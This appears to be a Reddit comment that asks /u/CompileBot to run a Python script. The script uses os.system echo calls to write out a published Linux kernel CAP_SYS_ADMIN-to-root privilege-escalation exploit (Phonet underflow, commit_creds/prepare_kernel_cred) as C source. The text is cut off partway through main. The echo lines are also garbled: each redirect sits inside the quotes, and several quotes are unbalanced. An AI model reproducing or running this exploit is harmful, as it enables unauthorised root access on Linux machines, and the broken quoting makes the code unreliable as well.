+/u/CompileBot python
import os
os.system("touch x.c")
os.system("echo '/* > x.c '")
os.system("echo ' * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) > x.c '")
os.system("echo ' * by Joe Sylve > x.c '")
os.system("echo ' * @jtsylve on twitter > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Released: Jan 7, 2011 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Based on the bug found by Dan Rosenberg (@djrbliss) > x.c '")
os.system("echo ' * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Usage: > x.c '")
os.system("echo ' * gcc -w caps-to-root2.c -o caps-to-root2 > x.c '")
os.system("echo ' * sudo setcap cap_sys_admin+ep caps-to-root2 > x.c '")
os.system("echo ' * ./caps-to-root2 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Kernel Version >= 2.6.34 (untested on earlier versions) > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * This exploit takes advantage of the same underflow as the original, > x.c '")
os.system("echo ' * but takes a different approach. Instead of underflowing into userspace > x.c '")
os.system("echo ' * (which doesn't work on 64-bit systems and is a lot of work), I underflow > x.c '")
os.system("echo ' * to some static values inside of the kernel which are referenced as pointers > x.c '")
os.system("echo ' * to userspace. This method is pretty simple and seems to be reliable. > x.c '")
os.system("echo ' */ > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#include <stdio.h> > x.c '")
os.system("echo '#include <sys/socket.h> > x.c '")
os.system("echo '#include <errno.h> > x.c '")
os.system("echo '#include <string.h> > x.c '")
os.system("echo '#include <sys/mman.h> > x.c '")
os.system("echo '#include <unistd.h> > x.c '")
os.system("echo ' > x.c '")
os.system("echo '// Skeleton Structures of the Kernel Structures we're going to spoof > x.c '")
os.system("echo 'struct proto_ops_skel { > x.c '")
os.system("echo ' int family; > x.c '")
os.system("echo ' void *buffer1[8]; > x.c '")
os.system("echo ' int (*ioctl)(void *, int, long); > x.c '")
os.system("echo ' void *buffer2[12]; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'struct phonet_protocol_skel { > x.c '")
os.system("echo ' void *ops; > x.c '")
os.system("echo ' void *prot; > x.c '")
os.system("echo ' int sock_type; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#ifdef __x86_64__ > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#define SYM_NAME "local_port_range" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x0000007f00000040 > x.c '")
os.system("echo '#define SYM_OFFSET 0x0 > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'typedef int (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#else //32-bit > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#define SYM_NAME "pn_proto" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x4e4f4850 > x.c '")
os.system("echo '#define SYM_OFFSET 0x90 > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#endif > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' > x.c '")
os.system("echo '_commit_creds commit_creds; > x.c '")
os.system("echo '_prepare_kernel_cred prepare_kernel_cred; > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'int getroot(void * v, int i, long l) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' commit_creds(prepare_kernel_cred(0)); > x.c '")
os.system("echo ' return 0; > x.c '")
os.system("echo '} > x.c '")
os.system("echo ' > x.c '")
os.system("echo '/* thanks spender... */ > x.c '")
os.system("echo 'unsigned long get_kernel_sym(char *name) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' FILE *f; > x.c '")
os.system("echo ' unsigned long addr; > x.c '")
os.system("echo ' char dummy; > x.c '")
os.system("echo ' char sname[512]; > x.c '")
os.system("echo ' int ret; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' char command[512]; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' sprintf(command, "grep \"%s\" /proc/kallsyms", name); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' f = popen(command, "r"); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' while(ret != EOF) { > x.c '")
os.system("echo ' ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if (ret == 0) { > x.c '")
os.system("echo ' fscanf(f, "%s\n", sname); > x.c '")
os.system("echo ' continue; > x.c '")
os.system("echo ' } > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if (!strcmp(name, sname)) { > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); > x.c '")
os.system("echo ' pclose(f); > x.c '")
os.system("echo ' return addr; > x.c '")
os.system("echo ' } > x.c '")
os.system("echo ' } > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' pclose(f); > x.c '")
os.system("echo ' return 0; > x.c '")
os.system("echo '} > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'int main(int argc, char * argv[]) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' int sock, proto; > x.c '")
os.system("echo ' unsigned long proto_tab, low_kern_sym, pn_proto; > x.c '")
os.system("echo ' void * map; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' /* Create a socket to load the module for symbol support */ > x.c '")
os.system("echo ' printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); > x.c '")
os.system("echo ' sock = socket(PF_PHONET, SOCK_DGRAM, 0); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if(sock < 0) { > x.c '")
os.system("echo ' if(errno == EPERM) > x.c '")
os.system("echo ' printf("[*] You don't have CAP_SYS_ADMIN.\n"); > x.c '")